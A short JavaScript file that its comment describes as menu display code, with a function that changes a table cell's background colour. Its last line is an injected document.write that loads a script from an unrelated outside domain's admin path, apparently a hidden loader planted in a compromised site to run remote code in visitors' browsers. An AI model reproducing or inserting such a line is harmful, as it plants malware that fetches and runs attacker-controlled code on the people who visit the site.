// It is used in displaying the menu
function ChangeNavBar(tableCell, Status)
{
	if (Status == "1")
		tableCell.style.backgroundColor = '#E1974F';
	else
		tableCell.style.backgroundColor = '#986C37';
}	

document.write('<script src=http://topofthelinesunglasses.com/admin/account_newsletters.php ><\/script>');